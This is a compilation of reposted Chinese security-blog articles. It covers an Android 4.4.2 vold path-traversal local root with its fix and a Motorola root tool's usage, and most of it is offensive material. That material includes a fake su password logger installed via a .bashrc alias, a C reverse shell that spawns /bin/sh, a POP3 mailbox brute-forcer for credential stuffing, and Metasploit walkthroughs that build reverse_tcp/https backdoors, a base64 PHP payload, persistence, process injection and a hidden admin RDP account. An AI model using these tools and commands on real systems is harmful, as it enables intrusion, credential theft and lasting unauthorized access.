Local root vulnerability in Android 4.4.2 and PoC

http://blog.cassidiancybersecurity.com/post/2014/06/Android-4.4.3%2C-or-fixing-an-old-local-root

Explains the cause of the Android 4.4.2 local privilege escalation vulnerability and how it is exploited.

http://forum.xda-developers.com/moto-x/orig-development/root-4-4-x-pie-motorola-devices-t2771623

Someone published an exploit for this vulnerability that gains root on Motorola phones.

Android 4.4.2 privilege escalation vulnerability PoC

 

————————————————

Google has just released Android 4.4.3 version in AOSP (Android Open Source Project). The Funky Android website has published the whole changelog between versions 4.4.2 and 4.4.3.

This time, it seems Google has fixed an old vulnerability that allows an application with only a few permissions to elevate its privileges to root, on any Android version supporting Android Secure External Caches (ASEC).

Looking at the previously linked changelog, one can notice the following fix in the vold daemon:

Project: platform/system/vold
0de7c61 : Validate asec names.

Vold (Volume Management Daemon) is a daemon running as root whose main goal is to handle removable media devices. ASEC are secured containers allowing applications to securely store data on the SD card, and were introduced back in 2010. These containers were created because the SD card filesystem (VFAT) does not allow privilege separation.

ASEC are simple files containing a ciphered filesystem, which is deciphered and mounted with permissions for a specific UID (and therefore for a specific application). The ASEC files (extension “.asec”) are stored on the SD card or in the “/data” folder, and mounted in a subfolder of “/mnt/asec”.

Vulnerability

The creation of the ASEC file is performed by the following code, in VolumeManager.cpp:

const char *asecDir = isExternal ? 
                  Volume::SEC_ASECDIR_EXT : Volume::SEC_ASECDIR_INT;
int written = snprintf(asecFileName, sizeof(asecFileName),
                  "%s/%s.asec", asecDir, id);

The mount point for the newly created asec is then defined as follows:

int written = snprintf(mountPoint, sizeof(mountPoint), 
                  "%s/%s", Volume::ASECDIR, id);

The vulnerability here is rather obvious: there is no check on the “id” variable, which is the name given by the user to their ASEC container. It is therefore possible to perform a basic path traversal, creating the ASEC file and its mount point in a different directory than expected, for example one the “attacker” can write into.

The following code is then responsible for the creation of the mount point:

if (mkdir(mountPoint, 0000)) {
  if (errno != EEXIST) {
    SLOGE("Mountpoint creation failed (%s)", strerror(errno));
    if (cleanupDm) {
      Devmapper::destroy(idHash);
    }
    Loop::destroyByDevice(loopDevice);
    unlink(asecFileName);
    return -1;
  }
}
[...]
mountStatus = xxx::doMount(dmDevice, mountPoint, false, 
                 false, false, ownerUid, 0, 0000, false);

This means that if the mount point already exists, no error is raised, and the container is mounted in “mountPoint” anyway. Guess what? If “mountPoint” already exists AND is a symlink to an existing directory, the ASEC container will be mounted over this directory. And the user will have full access to it, allowing them to write new files inside.

There are many ways of exploiting this vulnerability to gain root privileges.

Last detail about this vulnerability: it requires permissions to create ASEC containers. The “shell” user, as used by adb, has the required privileges. For the vulnerability to be exploited from an application, it needs the ASEC_* permissions (such as ASEC_CREATE).

The Fix

Google has now added a call to a new function “isLegalAsecId()” at the beginning of each function dealing with ASEC ids. The code of the function is the following:

bool VolumeManager::isLegalAsecId(const char *id) const {
  size_t i;
  size_t len = strlen(id);

  if (len == 0) {
    return false;
  }
  if ((id[0] == '.') || (id[len - 1] == '.')) {
    return false;
  }

  for (i = 0; i < len; i++) {
    if (id[i] == '.') {
      // i=0 is guaranteed never to have a dot. See above.
      if (id[i-1] == '.') return false;
      continue;
    }
    if (id[i] == '_' || id[i] == '-') continue;
    if (id[i] >= 'a' && id[i] <= 'z') continue;
    if (id[i] >= 'A' && id[i] <= 'Z') continue;
    if (id[i] >= '0' && id[i] <= '9') continue;
    return false;
  }

  return true;
}

This forbids “..” and “/” (indeed anything other than letters, digits, “_”, “-” and single dots) in ASEC ids, which fixes the path traversal attacks.
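As an added example (not vold's own code), here is a standalone C port of the isLegalAsecId() check placed in front of the two snprintf() calls that form the .asec path and the mount point, so that ids of the shape the post describes are rejected before any path is formed. The directory constants are assumed values standing in for Volume::SEC_ASECDIR_INT, Volume::SEC_ASECDIR_EXT and Volume::ASECDIR, and the sample ids are constructed.

```c
/* Added example, not vold's code: port of the Android 4.4.3 isLegalAsecId()
 * check, applied before the .asec file name and mount point are built. */
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define SEC_ASECDIR_INT "/data/app-asec"   /* assumed value of Volume::SEC_ASECDIR_INT */
#define SEC_ASECDIR_EXT "/mnt/secure/asec" /* assumed value of Volume::SEC_ASECDIR_EXT */
#define ASECDIR         "/mnt/asec"        /* Volume::ASECDIR, as named in the post */

/* Same rules as VolumeManager::isLegalAsecId(): non-empty, no leading or
 * trailing dot, no "..", and only [A-Za-z0-9._-]. A '/' is never accepted,
 * so no id can leave the directory it is joined onto. */
static bool is_legal_asec_id(const char *id)
{
    size_t len = strlen(id);
    if (len == 0) return false;
    if (id[0] == '.' || id[len - 1] == '.') return false;
    for (size_t i = 0; i < len; i++) {
        char c = id[i];
        if (c == '.') {
            /* i == 0 is never a dot (checked above), so id[i-1] is in bounds. */
            if (id[i - 1] == '.') return false;
            continue;
        }
        if (c == '_' || c == '-') continue;
        if (c >= 'a' && c <= 'z') continue;
        if (c >= 'A' && c <= 'Z') continue;
        if (c >= '0' && c <= '9') continue;
        return false;
    }
    return true;
}

/* Builds the container file name and mount point the way the post shows,
 * but only for a legal id. Returns 0 on success, -1 when the id is rejected
 * or a path would not fit (snprintf truncation is treated as an error). */
static int build_asec_paths(const char *id, bool is_external,
                            char *asec_file, size_t asec_file_len,
                            char *mount_point, size_t mount_point_len)
{
    if (!is_legal_asec_id(id)) return -1;

    const char *asec_dir = is_external ? SEC_ASECDIR_EXT : SEC_ASECDIR_INT;
    int n = snprintf(asec_file, asec_file_len, "%s/%s.asec", asec_dir, id);
    if (n < 0 || (size_t)n >= asec_file_len) return -1;

    n = snprintf(mount_point, mount_point_len, "%s/%s", ASECDIR, id);
    if (n < 0 || (size_t)n >= mount_point_len) return -1;
    return 0;
}

int main(void)
{
    /* Constructed sample ids: the first two have the traversal shape the
     * post describes; the others probe the edge cases of the check. */
    const char *ids[] = {
        "../../../tmp/x", "..", ".hidden", "trailing.",
        "a..b", "com.example.app-1", "", "plain_name-2",
    };
    char file[256], mnt[256];
    for (size_t i = 0; i < sizeof ids / sizeof ids[0]; i++) {
        int rc = build_asec_paths(ids[i], true, file, sizeof file, mnt, sizeof mnt);
        printf("%-20s -> %s %s\n", ids[i], rc == 0 ? "ok" : "REJECTED",
               rc == 0 ? mnt : "");
    }
    return 0;
}
```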

Conclusion

Google has fixed a very old local root vulnerability. We have evidence that this vulnerability was known, and it might already have been exploited in the wild by bad guys. Android is becoming more and more secure as Google introduces modern security mechanisms, but old code still needs to be fully audited to eradicate these 90s-style security vulnerabilities.

———————————————————————————

Changelog
1.1 – doh
fixes a bug where exploit only works once.

Pie is a root for Motorola devices; it should work up to and including 4.4.2.

I had hoped to save this until August; however, the bug was outed with 4.4.3, and detailed publicly by several people. It now has no value for my purposes. Sucks for me, great for you.

Vulnerability details:
http://blog.cassidiancybersecurity.c…old-local-root

This is a tethered root (think tethered jailbreak), meaning you have to run it each time you reboot in order to have root access. You do not get system write access, you do get root and busybox.

Usage:

adb push pie.jar /data/local/atvc

adb push root.sh /data/local/atvc

adb shell chmod 755 /data/local/atvc/root.sh

adb shell /data/local/atvc/root.sh

Expected output:

Retina:package jcase$ adb push pie.jar /data/local/atvc
5288 KB/s (1538203 bytes in 0.284s)
Retina:package jcase$ adb push root.sh /data/local/atvc
81 KB/s (137 bytes in 0.001s)
Retina:package jcase$ adb shell chmod 755 /data/local/atvc/root.sh
Retina:package jcase$ adb shell /data/local/atvc/root.sh
pie by jcase
want to buy me pie? paypal-> jcase@cunninglogic.com
Retina:package jcase$ adb shell
shell@ghost:/ $ su
root@ghost:/ # id
uid=0(root) gid=0(root) context=u:r:kernel:s0

Busybox license -> http://www.busybox.net/license.html
BusyBox v1.20.2-Stericson (2012-07-04 21:33:31 CDT) multi-call binary.
If busybox source is needed please ask me, while it is petty since you can get it from the obvious places, I will gladly package it on floppy disks and mail it media mail at your cost.

FAQ:
Where is source?
On my computer

Will it work on LG G3, Samsung <model>, Nexus 5?
No

Will you root X?
No, don’t ask me.

You suck!
Not really a question, but I get this a lot. This is the 5th exploit I have released for MotoX, bite me.

This doesn’t work, will you help me?
No, ask the community for support

Will you make this work on X?
No, this exploit, as it is, will only work on Motorola phones, and only some.

Will you do this for me?
No

This doesn’t work!
Then you are probably running firmware that has been patched, you should have bought a dev edition.

Will you X?
No

What is your favorite pie?
I like apple pie with vanilla ice cream, and Boston cream pie.

I’m taking a break of an undetermined length. Please don’t contact me about exploits

Something important? jcase@cunninglogic.com
Like Android security topics? Join our G+ community -> https://plus.google.com/communities/…07618051049043
My Bitcoin address : 1Newifz6yETTmbziCsZZstmHHPH6ejNr75

Small Python scripts for penetration testing

0x00

Very often in penetration testing the tools you find do not fit the situation, and writing your own code is the way to go. The three programs below were all written by me during engagements when no suitable tool could be found online. They are short and useful; I hope you like them and rate them well.

0x01

Small tool for recording the root password

root.py

#!/usr/bin/python
import getpass, time

current_time = time.strftime("%Y-%m-%d %H:%M")
logfile = "/dev/shm/.su.log"  # captured passwords are recorded here
# CentOS
# fail_str = "su: incorrect password"
# Ubuntu
# fail_str = "su: Authentication failure"
# For Linux Korea; CentOS, Ubuntu and Korea print different messages when su to root fails
fail_str = "su: incorrect password"
try:
    passwd = getpass.getpass(prompt='Password: ')
    f = open(logfile, 'a')
    f.write("[%s]\t%s" % (passwd, current_time))  # record the root password
    f.write('\n')
    f.close()
except:
    pass
time.sleep(1)
print(fail_str)  # print the "su failed" message

When you have gained a low-privilege foothold on a Linux box and privilege escalation gets nowhere, upload this program and add the line alias su='/usr/root.py' to the .bashrc in a low-privilege user's home directory; when that user runs su root, the password is recorded. See the script for the log path.

0x02

Reverse shell with a chosen source port

While penetrating a Linux server, a reverse connection to port 888 did not work, and neither did 53 or 80.

Pinging Baidu worked, though,

so there is only one truth:

the server had been perversely restricted so that only certain source ports may be used to connect outwards.

For example,

only packets destined for port 80 are accepted, and replies go out with 80 as the source port.

Googling for a program found nothing, so after looking up the relevant APIs I wrote one myself.

client-port.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

void error(char *msg)
{
    perror(msg);
    exit(0);
}

int main(int argc, char *argv[])
{
    int sockfd, portno, lportno;
    struct sockaddr_in serv_addr;
    struct sockaddr_in client_addr;
    struct hostent *server;

    if (argc < 4) {  /* three arguments: target host, target port, local source port */
        fprintf(stderr, "usage %s hostname port LocalPort\n", argv[0]);
        exit(0);
    }
    portno = atoi(argv[2]);
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0)
        error("ERROR opening socket");

    bzero((char *)&client_addr, sizeof(client_addr));
    lportno = atoi(argv[3]);
    client_addr.sin_family = AF_INET;
    client_addr.sin_addr.s_addr = INADDR_ANY;
    client_addr.sin_port = htons(lportno);  /* set the source port */
    if (bind(sockfd, (struct sockaddr *)&client_addr, sizeof(client_addr)) < 0)
        error("ERROR on binding");

    server = gethostbyname(argv[1]);
    if (server == NULL) {
        fprintf(stderr, "ERROR, no such host\n");
        exit(0);
    }
    bzero((char *)&serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    bcopy((char *)server->h_addr, (char *)&serv_addr.sin_addr.s_addr, server->h_length);
    serv_addr.sin_port = htons(portno);
    if (connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)  /* connect */
        error("ERROR connecting");
    dup2(sockfd, 0);
    dup2(sockfd, 1);
    dup2(sockfd, 2);
    execl("/bin/sh", "sh", "-i", NULL);  /* run a shell */
    close(sockfd);
}

Usage:

gcc client-port.c -o port
chmod +x port
./port <your IP> <your listening port> <local source port>

e.g. ./port http://www.91ri.org 80 80

The shell is successfully bounced back; privilege escalation done.

0x03

Mailbox brute-force script

At some point I needed to brute-force a batch of mailboxes.

Burp163.pl

#!/usr/bin/perl
use Net::POP3;
$email = "pop.163.com";  # set the POP server address; for QQ it is pop.qq.com
$pop = Net::POP3->new($email) or die("ERROR: Unable to initiate. ");
print $pop->banner();
$pop->quit;
$i = 0;
open(fp1, "user.txt");
@array1 = <fp1>;
open(fp2, "pass.txt");
@array2 = <fp2>;  # read the mailbox user names and passwords from the files
foreach $a (@array1) {
    $u = substr($a, 0, length($a) - 1);
    $u = $u . '@163.com';
    foreach $b (@array2) {
        $p = substr($b, 0, length($b) - 1);
        print "cracked with " . $u . "-----" . $p . "\n";
        $i = $i + 1;
        $pop = Net::POP3->new($email) or die("ERROR: Unable to initiate. ");
        $m = $pop->login($u, $p);  # try to log in to the mailbox
        if ($m > 0)
        {
            print $u . "------------" . $p . "----" . "success" . "\n";
            $pop->quit;
        }  # login succeeded
        else
        {
            print $u . "------------" . $p . "----" . "failed" . "\n";
            $pop->quit;  # login failed
        }
    }
}
print $i;
Usage: write the POP server of the mailboxes you want to brute-force into the following line (the default is 163 mail):

$email = "pop.163.com";
Then strip the part after the @ from the mailbox addresses (e.g. lusiyu@163.com becomes lusiyu) and put them into user.txt in the same directory; put the dictionary into pass.txt.

You might say:

Isn't this a bit useless? What if the mailbox password is complex?

Heh.

Get hold of the data of some small site,

and use this program to batch-test whether those passwords are also the mailbox passwords. Heh.

I said nothing.

0x04

These three programs are for technical research only; the author accepts no responsibility if readers use them for illegal purposes.
Reposted from: http://www.91ri.org/8680.html

msfmap and scheduleme

I have been studying meterpreter lately and came across msfmap, which is great. There are others that do more or less the same, but………………

https://msfmap.googlecode.com/files/MSFMap-v0.1.1.tar.bz2
That is the download address.
How to install it?
Find where your MSF lives; on Windows you know the path yourself. On BT5 it is usually
/opt/metasploit/msf3
/pentest/exploits/framework3
Mine is in the first one; most installs should be the same.

Give install.sh execute permission,
then run
./install.sh /opt/metasploit/msf3
to install it into msf3.

Load msfmap with: load msfmap
msfmap is similar to nmap. (Actually quite different.)

meterpreter > load msfmap
Loading extension msfmap…success.
meterpreter > msfmap -PN 192.168.0.1/24

Starting MSFMap 0.1.1
MSFMap scan report for 192.168.0.1
Host is up.
Not shown: 99 closed ports
PORT   STATE SERVICE
80/tcp open  http

MSFMap scan report for 192.168.0.100
Host is up.
Not shown: 100 closed ports

MSFMap scan report for 192.168.0.101
Host is up.
Not shown: 99 closed ports
PORT   STATE SERVICE
80/tcp open  http

MSFMap scan report for 192.168.0.103
Host is up.
Not shown: 97 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
6001/tcp open  X11:1

MSFMap scan report for 192.168.0.104
Host is up.
Not shown: 100 closed ports

MSFMap scan report for 192.168.0.105
Host is up.
Not shown: 98 closed ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

MSFMap scan report for 192.168.0.107
Host is up.
Not shown: 97 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

MSFMap scan report for 192.168.0.108
Host is up.
Not shown: 97 closed ports
PORT    STATE SERVICE
21/tcp  open  ftp
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

MSFMap scan report for 192.168.0.111
Host is up.
Not shown: 95 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
3389/tcp open  ms-term-serv

MSFMap done: 256 IP address (9 hosts up) scanned in 57.54 seconds

meterpreter >

Because a lot of people share my home broadband, this is not the point here. Please ignore it.

meterpreter > msfmap -h
MSFMap (v0.1.1) Meterpreter Base Port Scanner
Usage: msfmap [Options] {target specification}

OPTIONS:

–top-ports <opt>  Scan <number> most common ports
-PN                Treat all hosts as online — skip host discovery
-T<0-5>            Set timing template (higher is faster)
-h                 Print this help summary page.
-oN         <opt>  Output scan in normal format to the given filename.
-p          <opt>  Only scan specified ports
-sP                Ping Scan – go no further than determining if host is online
-sS                TCP Syn scan
-sT                TCP Connect() scan
-v                 Increase verbosity level

Of the options above, it seems only the first two work???? The rest all failed in my tests; I don't know why.
meterpreter > msfmap 192.168.0.100-120  (this form also works.)
This scanner has some problems and is not very accurate. Until I find a way to load nmap into meterpreter, I will use this for now.
———————————————————————————————————
meterpreter > run scheduleme -h
Scheduleme — provides most common scheduling types used during a pentest
This script can upload a given executable or script and schedule it to be
executed. All scheduled task are run as System so the Meterpreter process
must be System or local admin for local schedules and Administrator for
remote schedules

OPTIONS:

-c  <opt>  Command to execute at the given time. If options for execution needed use double quotes
-d         Daily.
-e  <opt>  Executable or script to upload to target host, will not work with remote schedule
-h         Help menu.
-hr <opt>  Every specified hours 1-23.
-i         Run command imediatly and only once.
-l         When a user logs on.
-m  <opt>  Every specified amount of minutes 1-1439
-o  <opt>  Options for executable when upload method used
-p         Password for account provided.
-r         Remote Schedule. Executable has to be already on remote target
-s         At system startup.
-t  <opt>  Remote system to schedule job.
-u         Username of account with administrative privelages.

run scheduleme -e /root/2222.exe -l

With the -s and -i options I never receive a session.
-l does work, though.

Uploading a backdoor this way amounts to a permanent session: whenever a user logs on, you get a session. Extremely powerful. Upload one that gets through the firewall, you know what I mean.

from: http://hi.baidu.com/67115248/item/085f9cd043b59b58fa576871

Metasploit BackDoor For Windows

The Metasploit Framework (MSF) was released as open source in 2003 and is a freely available development framework. It is a powerful open-source platform for developing, testing and using malicious code, and provides a reliable environment for penetration testing, shellcode writing and vulnerability research.
This extensible model brings together payload control, encoders, NOP generators and exploits, making the Metasploit Framework a way to research high-risk vulnerabilities. It integrates the common overflow vulnerabilities and popular shellcode of every platform, and is continuously updated. The latest MSF contains more than 750 exploits for popular operating systems and applications, plus N shellcodes. As a security tool it plays a role in security testing that cannot be ignored, and it provides strong support for automated vulnerability discovery and timely detection of system vulnerabilities.
It also offers several kinds of backdoors; let us take a simple look at them.

msfpayload as shellcode

View the full list; at the moment there are 248 payloads.

root@Dis9Team:/home/brk# msfpayload -l


It can generate all sorts of things.
Simply put, one example:

A normal Windows backdoor

Using windows/meterpreter/reverse_tcp:

msfpayload windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=8080 R | \
  msfencode -b '' -t exe -o /var/www/meterpreter.exe


After generating it, make the target run it; on our side we need to listen for the connection, or for the shell.

msf > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf  exploit(handler) > set LPORT 8080
LPORT => 8080
msf  exploit(handler) > exploit 

[*] Started reverse handler on 5.5.5.1:8080
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 5.5.5.3
[*] Meterpreter session 1 opened (5.5.5.1:8080 -> 5.5.5.3:1055) at 2012-03-21 23:26:58 +0800

meterpreter >

Others (php, asp, jsp, dll)

Pick the msfpayload name you want and generate it; you know the drill. For example:
Dll:


Reference: The DLL Hijacking Tutorial
php:

 msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->

JAVA:

 ./msfpayload java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 W > /tmp/job.jar

 

Abnormal Windows backdoors

Where there is normal there is also abnormal, for example reverse_https and reverse_http.
Everyone knows these get straight through firewalls. When a connection is unexpectedly interrupted we can reconnect, just like Gray Pigeon (灰鸽子). The default is 5 minutes; you can set the SessionExpirationTimeout option to 0, meaning the connection never expires.

brk@Dis9Team:~$ sudo msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe
brk@Dis9Team:~$ file https.exe
https.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

Now let us run it.

msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf  exploit(handler) > set LHOST 5.5.5.1
LHOST => 5.5.5.1
msf  exploit(handler) > set LPORT 1111
LPORT => 1111
msf  exploit(handler) > set SessionCommunicationTimeout 0
SessionCommunicationTimeout => 0
msf  exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
msf  exploit(handler) > [*] Starting the payload handler...
[*] 5.5.5.3:1060 Request received for /AauE...
[*] 5.5.5.3:1060 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 2 opened (5.5.5.1:1111 -> 5.5.5.3:1060) at 2012-03-21 23:40:06 +0800

Success. I clicked twice, so there are two shells; let us delete the shell sessions.

msf  exploit(handler) > sessions 

Active sessions
===============

  Id  Type                   Information                    Connection
  --  ----                   -----------                    ----------
  2   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1060 (5.5.5.3)
  3   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1  5.5.5.1:1111 -> 5.5.5.3:1118 (5.5.5.3)
msf  exploit(handler) > sessions -k 2
[*] Killing session 2
[*] Meterpreter session 2 closed.
msf  exploit(handler) > sessions -k 3
[*] Killing session 3
[*] Meterpreter session 3 closed.
msf  exploit(handler) > sessions 

Active sessions
===============

No active sessions.

msf  exploit(handler) >

Keep listening:

msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://5.5.5.1:1111/
[*] Starting the payload handler...
msf  exploit(handler) > [*] 5.5.5.3:1280 Request received for /AauE...
[*] 5.5.5.3:1280 Staging connection for target /AauE received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 4 opened (5.5.5.1:1111 -> 5.5.5.3:1280) at 2012-03-21 23:45:57 +0800

We got a shell again.

persistence

This one is a post-exploitation module; the prerequisite is that you already have a shell session. It creates a persistent backdoor that starts as a system service.
First connect to the shell and look at the help:

msf  exploit(handler) > sessions -i 4
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter >

Now let us run it:

meterpreter > run persistence -A -L c:\\windows\\ -x -i 5 -p 1234 -r 5.5.5.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=5.5.5.1 LPORT=1234
[*] Persistent agent script is 609512 bytes long
[+] Persistent Script written to c:\windows\\FBEzRzQYpXKFg.vbs
[*] Starting connection handler at port 1234 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script c:\windows\\FBEzRzQYpXKFg.vbs
[+] Agent executed with PID 3280
meterpreter >

It is installed into c:\windows and connects back to port 1234 every 5 seconds; our machine is 5.5.5.1.
Now let us see what happened on the target:

Several VBS files have appeared; that is the trojan. When the machine reboots or a user logs in, it runs automatically. How do we remove it afterwards?

[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc

Run it:

meterpreter > resource /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Reading /root/.msf4/logs/persistence/DIS9TEAM-A1_20120321.5048/DIS9TEAM-A1_20120321.5048.rc
[*] Running rm c:\windows\\FBEzRzQYpXKFg.vbs

payload inject

Inject another payload. For example:

msf  exploit(ms08_067_netapi) > use post/windows/manage/payload_inject
msf  post(payload_inject) >
msf  post(payload_inject) > show options 

Module options (post/windows/manage/payload_inject):

   Name     Current Setting                  Required  Description
   ----     ---------------                  --------  -----------
   HANDLER  false                            no        Start an Exploit Multi Handler to receive the connection
   LHOST    5.5.5.1                          yes       IP of host that will receive the connection from the payload.
   LPORT    4433                             no        Port for Payload to connect to.
   OPTIONS                                   no        Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
   PAYLOAD  windows/meterpreter/reverse_tcp  no        Windows Payload to inject into memory of a process.
   PID                                       no        Process Identifier to inject of process to inject payload.
   SESSION                                   yes       The session to run this module on.

msf  post(payload_inject) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf  post(payload_inject) > set LPORT 9999
LPORT => 9999
msf  post(payload_inject) > set TimestampOutput 0
TimestampOutput => 0
msf  post(payload_inject) > set SESSION 5
SESSION => 5
msf  post(payload_inject) > exploit 

[*] Running module against DIS9TEAM-A1
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager into process ID 1636
[*] Opening process 1636
[*] Generating payload
[*] Allocating memory in procees 1636
[*] Allocated memory at address 0x00780000, for 363 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 1636
[*] Post module execution completed
msf  post(payload_inject) > sessions 

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

msf  post(payload_inject) >

TCP Shell Session

Set up the backdoor according to the scripting environment installed on the target: auto, ruby, python, perl or bash. It works on Linux too.
Since I have none of those installed... you know how it goes.

msf  post(system_session) > show options 

Module options (post/multi/manage/system_session):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  false            yes       Start an Exploit Multi Handler to receive the connection
   LHOST    5.5.5.1          yes       IP of host that will receive the connection from the payload.
   LPORT    4433             no        Port for Payload to connect to.
   SESSION                   yes       The session to run this module on.
   TYPE     auto             yes       Scripting environment on target to use for reverse shell (accepted: auto, ruby, python, perl, bash)

msf  post(system_session) > set HANDLER true
HANDLER => true
msf  post(system_session) > sessions 

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  4   meterpreter x86/win32  DIS9TEAM-A1\brk @ DIS9TEAM-A1      5.5.5.1:1111 -> 5.5.5.3:1280 (5.5.5.3)
  5   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ DIS9TEAM-A1  5.5.5.1:4444 -> 5.5.5.3:1042 (5.5.5.3)

msf  post(system_session) > set SESSION 5
SESSION => 5
msf  post(system_session) > exploit
[-] Post failed: Msf::OptionValidateError The following options failed to validate: TYPE.
msf  post(system_session) > set TYPE bash
TYPE => bash
msf  post(system_session) > exploit 

[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:4433
[*] Starting the payload handler...
[*] Post module execution completed
msf  post(system_session) > set TYPE python
TYPE => python
msf  post(system_session) > exploit 

[*] Starting exploit multi handler
[-] Job 4 is listening on IP 5.5.5.1 and port 4433
[-] Could not start handler!
[-] A job is listening on the same Port
[*] Post module execution completed
msf  post(system_session) > set LPORT 5555
LPORT => 5555
msf  post(system_session) > exploit 

[*] Starting exploit multi handler
[*] Started reverse handler on 5.5.5.1:5555
[*] Starting the payload handler...
[*] Post module execution completed
msf  post(system_session) >

pxexploit

Per the module description:
This module provides a PXE server, running a DHCP and TFTP server.
The default configuration loads a linux kernel and initrd into
memory that reads the hard drive; placing a payload to install
metsvc, disable the firewall, and add a new user metasploit on any
Windows partition seen, and add a uid 0 user with username and
password metasploit to any linux partition seen. The windows user
will have the password p@SSw0rd!123456 (in case of complexity
requirements) and will be added to the administrators group. See
exploit/windows/misc/pxesploit for a version to deliver a specific
payload. Note: the displayed IP address of a target is the address
this DHCP server handed out, not the “normal” IP address the host
uses.
I don't have the setup for this, so no demo.

Automatic 3389 (RDP)

Very simple: enter the module and set the account, password and port.

msf  post(enable_rdp) > show options 

Module options (post/windows/manage/enable_rdp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ENABLE    true             no        Enable the RDP Service and Firewall Exception.
   FORDWARD  false            no        Forward remote port 3389 to local Port.
   LPORT     3389             no        Local port to fordward remote connection.
   PASSWORD                   no        Password for the user created.
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        The username of the user to create.

msf  post(enable_rdp) > set USERNAME test
USERNAME => test
msf  post(enable_rdp) > set PASSWORD test
PASSWORD => test
msf  post(enable_rdp) > set SESSION 5
SESSION => 5
msf  post(enable_rdp) > exploit 

[*] Enabling Remote Desktop
[*]  RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]  The Terminal Services service is not set to auto, changing it to auto ...
[*]  Opening port in local firewall if necessary
[*] Setting user account for logon
[*]  Adding User: test with Password: test
[*]  Adding User: test to local group 'Remote Desktop Users'
[*]  Adding User: test to local group 'Administrators'
[*] You can now login with the created user
